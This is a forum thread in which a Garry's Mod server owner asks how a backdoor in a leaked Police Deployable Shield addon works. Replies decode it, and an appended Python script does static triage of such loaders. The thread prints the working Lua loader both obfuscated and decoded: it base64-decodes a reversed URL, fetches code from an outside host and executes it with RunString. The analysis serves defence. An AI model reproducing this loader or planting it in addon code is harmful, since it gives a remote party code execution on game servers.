Backdoor found in leaked script, how does it work?


if SERVER then resource.AddWorkshop("609456211"); 
hook.Add("\84\104\105\110\107", "\65\66\67\68\69\70\71\69\71\71\69\71\69", function() RunString("\102\117\110\99\116\105\111\110\32\117\116\105\108\46\65\66\67\68\69\70\71\69\69\90\71\69\69\71\90\71\69\40\32\100\97\116\97\32\41\32\108\111\99\97\108\32\98\61\39\65\66\67\68\69\70\71\72\73\74\75\76\77\78\79\80\81\82\83\84\85\86\87\88\89\90\97\98\99\100\101\102\103\104\105\106\107\108\109\110\111\112\113\114\115\116\117\118\119\120\121\122\48\49\50\51\52\53\54\55\56\57\43\47\39\32\105\102\32\33\100\97\116\97\32\116\104\101\110\32\114\101\116\117\114\110\32\101\110\100\32\100\97\116\97\32\61\32\115\116\114\105\110\103\46\103\115\117\98\40\100\97\116\97\44\32\39\91\94\39\46\46\98\46\46\39\61\93\39\44\32\39\39\41\32\114\101\116\117\114\110\32\40\100\97\116\97\58\103\115\117\98\40\39\46\39\44\32\102\117\110\99\116\105\111\110\40\120\41\32\105\102\32\40\120\32\61\61\32\39\61\39\41\32\116\104\101\110\32\114\101\116\117\114\110\32\39\39\32\101\110\100\32\108\111\99\97\108\32\114\44\102\61\39\39\44\40\98\58\102\105\110\100\40\120\41\45\49\41\32\102\111\114\32\105\61\54\44\49\44\45\49\32\100\111\32\114\61\114\46\46\40\102\37\50\94\105\45\102\37\50\94\40\105\45\49\41\62\48\32\38\38\32\39\49\39\32\124\124\32\39\48\39\41\32\101\110\100\32\114\101\116\117\114\110\32\114\59\32\101\110\100\41\58\103\115\117\98\40\39\37\100\37\100\37\100\63\37\100\63\37\100\63\37\100\63\37\100\63\37\100\63\39\44\32\102\117\110\99\116\105\111\110\40\120\41\32\105\102\32\40\35\120\32\126\61\32\56\41\32\116\104\101\110\32\114\101\116\117\114\110\32\39\39\32\101\110\100\32\108\111\99\97\108\32\99\61\48\32\102\111\114\32\105\61\49\44\56\32\100\111\32\99\61\99\43\40\120\58\115\117\98\40\105\44\105\41\61\61\39\49\39\32\38\38\32\50\94\40\56\45\105\41\32\124\124\32\48\41\32\101\110\100\32\114\101\116\117\114\110\32\115\116\114\105\110\103\46\99\104\97\114\40\99\41\32\101\110\100\41\41\32\101\110\100\32\104\116\116\112\46\70\101\116\99\104\40\115\116\114\105\110\103\46\114\101\118\101\114\115\101\40\117\116\105\
108\46\65\66\67\68\69\70\71\69\69\90\71\69\69\71\90\71\69\40\39\99\71\104\119\76\106\70\108\90\50\70\48\99\121\57\108\99\109\57\106\76\50\70\115\98\71\86\105\99\109\70\116\76\51\74\109\76\110\112\108\100\87\100\121\90\87\49\104\98\67\56\118\79\110\66\48\100\71\103\61\39\41\41\44\102\117\110\99\116\105\111\110\40\98\111\100\121\44\108\101\110\44\104\101\97\100\101\114\115\44\99\111\100\101\41\32\82\117\110\83\116\114\105\110\103\40\98\111\100\121\41\32\101\110\100\41") hook.Remove("\84\104\105\110\107", "\65\66\67\68\69\70\71\69\71\71\69\71\69") end)
end

Disclaimer: My English is not advanced, I'm Norwegian.

You may say this is deserved punishment for using illegal and leaked scripts from codeshire / scriptfolder. This script is the Police Deployable Shield (leaked version).

I just recently cross-checked the legal and non-legal versions, which have A LOT of downloads. Well, the leaked script does have a hook.Add with RunString, but what I cannot understand is how it gets executed.

From what I can understand, this requires a second-hand script, and does not get executed by console command. Lucky for most server owners who run servers is that this backdoor was created for a French community and was actually never meant for others; well, the point is that this is not a well-known backdoor such as drugz mood and fireworks.

Please remember the script from the content creator is safe; what I'm asking about is the edited, leaked version.
**MARK: The reason why I'm even bothering to ask is that I don't understand this backdoor.** Please don't ban me if this breaks any rules; I barely post here because you guys are strict about grammar.

My point: what can this backdoor do?

  1. Stop using leaks. People put a lot of effort into making this stuff and it’s a bit of a dick move to use them.
  2. The script requests something from http://lamerguez.fr/marbella/core/stage1.php, which is down.

Hey.

No, I'm not using leaks, and trust me on that (I support creators). The reason why I did cross-check the leaked one was a claim that the police shield might have a backdoor (I use the creator's script). I wanted to be sure that the creator didn't add a backdoor; that is why I cross-checked the scripts.

How did you manage to find out about the requests? *Sorry for asking, but I have no coding experience.*

A simple way would be to change http.Fetch to print out the arguments instead of doing what it's supposed to do.

Right, I'm curious because I've never looked at it.

How do you turn the \84\104\105\110\107 bullshit back into actual code? I'm assuming each number represents a character of some sort, but how do you convert it?

You print it. That’s all you do.

Just print it out in the Lua demo or C++; they’re all escape characters.

Ty :smiley:

Also, it seems this code came up before on FP (or something extremely similar).

http://forum.facepunch.com/showthread.php?t=1529806&p=50841296

I’ve never seen these escape characters before.
Could you please post the output here if you decide to try printing it?

[lua]hook.Add("Think", "ABCDEFGEGGEGE", function()
	-- a plain base64 decoder hidden behind a random-looking name
	function util.ABCDEFGEEZGEEGZGE(data)
		local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		if not data then return end
		data = string.gsub(data, '[^' .. b .. '=]', '')

		return (data:gsub('.', function(x)
			if (x == '=') then return '' end
			local r, f = '', (b:find(x) - 1)

			for i = 6, 1, -1 do
				r = r .. (f % 2 ^ i - f % 2 ^ (i - 1) > 0 and '1' or '0')
			end

			return r
		end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
			if (#x ~= 8) then return '' end
			local c = 0

			for i = 1, 8 do
				c = c + (x:sub(i, i) == '1' and 2 ^ (8 - i) or 0)
			end

			return string.char(c)
		end))
	end

	-- the base64 literal is the URL stored backwards; whatever the server
	-- answers with is executed as Lua on the game server
	http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL2FsbGVicmFtL3JmLnpldWdyZW1hbC8vOnB0dGg=')), function(body, len, headers, code)
		RunString(body)
	end)

	-- the Think hook removes itself, so the fetch happens only once
	hook.Remove("Think", "ABCDEFGEGGEGE")
end)[/lua]

Thank you very much

If anyone is curious, 'cGhwLjFlZ2F0cy9lcm9jL2FsbGVicmFtL3JmLnpldWdyZW1hbC8vOnB0dGg=' is base64 for 'php.1egats/eroc/allebram/rf.zeugremal//:ptth', which is just http://lamerguez.fr/marbella/core/stage1.php backwards, obviously.
Why do people even do shit like this, it looks like an obvious backdoor and you can clean up the code so easily it probably takes more time trying to protect it.

All it takes is one glance at the top 3 most popular gamemode tabs on the server browser and you quickly get the idea of how much of a clue and scruples community managers at large have these days.
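As an added example (not code from the thread or from the script's author), here is the "print it" step done statically in Python, so the suspect Lua never has to be run: it decodes the \ddd decimal escapes asked about above, base64-decodes any long quoted literal and checks both the decoded text and its reverse for a URL (this loader stores the address backwards), and reports the hook plus the dangerous calls. The sample is a constructed, shortened loader in the same encoding scheme as the leaked one; b64 is a hypothetical decoder name.

```python
import base64
import re

# Constructed sample in the same scheme as the leaked loader: Lua decimal escapes
# hide the hook name, a base64 literal hides the reversed URL, and the decoded
# text is handed to RunString. (b64 is a hypothetical decoder name.)
SAMPLE = r"""
hook.Add("\84\104\105\110\107", "\65\66\67\68\69\70\71\69\71\71\69\71\69", function()
  RunString("\104\116\116\112\46\70\101\116\99\104\40string.reverse(b64('cGhwLjFlZ2F0cy9lcm9jL2FsbGVicmFtL3JmLnpldWdyZW1hbC8vOnB0dGg=')), \82\117\110\83\116\114\105\110\103)")
end)
"""

LUA_DEC_ESCAPE = re.compile(r"\\(\d{1,3})")                 # \84, \104, ...
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
URL = re.compile(r"https?://[\w.-]+(?:/[\w./-]*)?")


def decode_escapes(lua_src: str) -> str:
    """Turn every Lua decimal escape (\\ddd) into the character it stands for."""
    return LUA_DEC_ESCAPE.sub(lambda m: chr(int(m.group(1))), lua_src)


def reveal_urls(text: str) -> list[str]:
    """Base64-decode every literal that looks like base64 and look for a URL in
    the result both as-is and reversed, since this loader stores it backwards."""
    found = []
    for literal in B64_LITERAL.findall(text):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("latin-1")
        except ValueError:
            continue  # not real base64 (e.g. a long identifier), skip it
        for candidate in (decoded, decoded[::-1]):
            found.extend(URL.findall(candidate))
    return found


def triage(lua_src: str) -> dict:
    """Static triage: peel the escape layer, then report which event the code
    hooks, which dangerous calls it makes, and which URLs it hides."""
    plain = decode_escapes(lua_src)
    hook = re.search(r'hook\.Add\("([^"]+)",\s*"([^"]+)"', plain)
    return {
        "decoded": plain,
        "hook_event": hook.group(1) if hook else None,
        "hook_id": hook.group(2) if hook else None,
        "dangerous_calls": sorted(c for c in ("RunString", "http.Fetch", "CompileString") if c in plain),
        "urls": reveal_urls(plain),
    }


if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report["decoded"])
    print(report["hook_event"], report["hook_id"], report["dangerous_calls"], report["urls"])
```

Feed the real file's text in place of SAMPLE and the same three steps apply; the CompileString check is there because other loaders use it instead of RunString.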